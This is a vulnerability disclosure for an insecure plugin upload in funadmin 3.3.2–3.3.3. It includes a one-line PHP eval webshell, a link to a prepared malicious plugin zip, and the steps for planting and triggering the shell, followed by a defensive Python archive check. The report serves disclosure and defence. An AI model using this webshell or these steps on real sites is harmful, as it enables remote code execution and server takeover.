Leeyangee changed the title from "Insecure file upload via plugins install in funadmin v3.3.2" to "Insecure file upload via plugins install in funadmin v3.3.2 - v3.3.3" on Jun 13, 2023.
Vulnerability Product: funadmin
Vulnerability version: 3.3.2 - 3.3.3
Vulnerability type: Insecure file upload
Vulnerability Details:
Vulnerability location: `app\backend\controller\Addon.php#localinstall` method
The method `localinstall` doesn't check for any webshell or sensitive function in the uploaded files, which may cause insecure file upload.
(Four screenshots are attached here in the original issue.)
Firstly, we download a free plugin and unzip it. The root path of the plugin is as follows:
Then, we add a webshell into /public/js.
Content of the shell:
`<?pup @eval($_REQUEST['shell']); ?>`
After that, we zip the entire plugin.
Example plugin (webshell already placed): https://github.com/Leeyangee/leeya_bug/raw/main/demo.zip
Finally, we find a website that uses funadmin v3.3.2, visit http://localhost/backend/index/index.html, and click "install offline" ("离线安装").
(Two screenshots are attached here in the original issue.)
Select the plugin we just zipped; after it is installed, visit http://localhost/static/demo/js/shell.php?shell=phpinfo();
Proof that the webshell has been uploaded via plugin install.
Discoverer: leeya_bug
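A pre-install check of the kind the report says `localinstall` lacks, as an added example (not funadmin's code): it walks a plugin zip before extraction and rejects any PHP file, or any file containing a PHP open tag, under the `public/` directory that ends up web-served, while still allowing PHP in the plugin's code directories. The `public/` prefix, the extension list and the sample archive are assumptions constructed for this example.

```python
import io
import re
import zipfile
from typing import List

# Plugin directories whose files become web-reachable after installation
# (assumed: the report's public/js ended up at static/demo/js on the server).
WEB_SERVED_PREFIXES = ("public/",)
# Extensions the PHP handler would execute if the file is requested directly.
PHP_EXTENSIONS = (".php", ".phtml", ".phar", ".php5", ".php7", ".phps")
# PHP open tags; catches PHP hidden in a file with a harmless-looking extension.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def audit_plugin_archive(data: bytes) -> List[str]:
    """Inspect a plugin zip before extraction; return findings (empty = accept)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if info.is_dir():
                continue
            # Entries that would escape the extraction directory are never acceptable.
            if name.startswith("/") or ".." in name.split("/"):
                findings.append(f"unsafe path: {name}")
                continue
            # PHP belongs in the plugin's code directories, never under public/.
            if not name.startswith(WEB_SERVED_PREFIXES):
                continue
            if name.lower().endswith(PHP_EXTENSIONS):
                findings.append(f"php file in web-served dir: {name}")
            elif PHP_OPEN_TAG.search(zf.read(info)):
                findings.append(f"php code in non-php file: {name}")
    return findings


def build_sample_archive(include_bad: bool = True) -> bytes:
    """Constructed sample plugin: legitimate entries, plus bad ones if requested."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("controller/Index.php", "<?php // plugin code lives here ?>")
        zf.writestr("public/js/app.js", "console.log('ok');")
        if include_bad:
            # Same placement as in the report: a .php file under public/js.
            zf.writestr("public/js/shell.php", "<?php /* constructed placeholder */ ?>")
            # PHP open tag inside a file with a non-PHP extension.
            zf.writestr("public/img/logo.png", "<?php /* constructed placeholder */ ?>")
    return buf.getvalue()
```

An installer would call `audit_plugin_archive` on the uploaded bytes and refuse to extract when the list is non-empty.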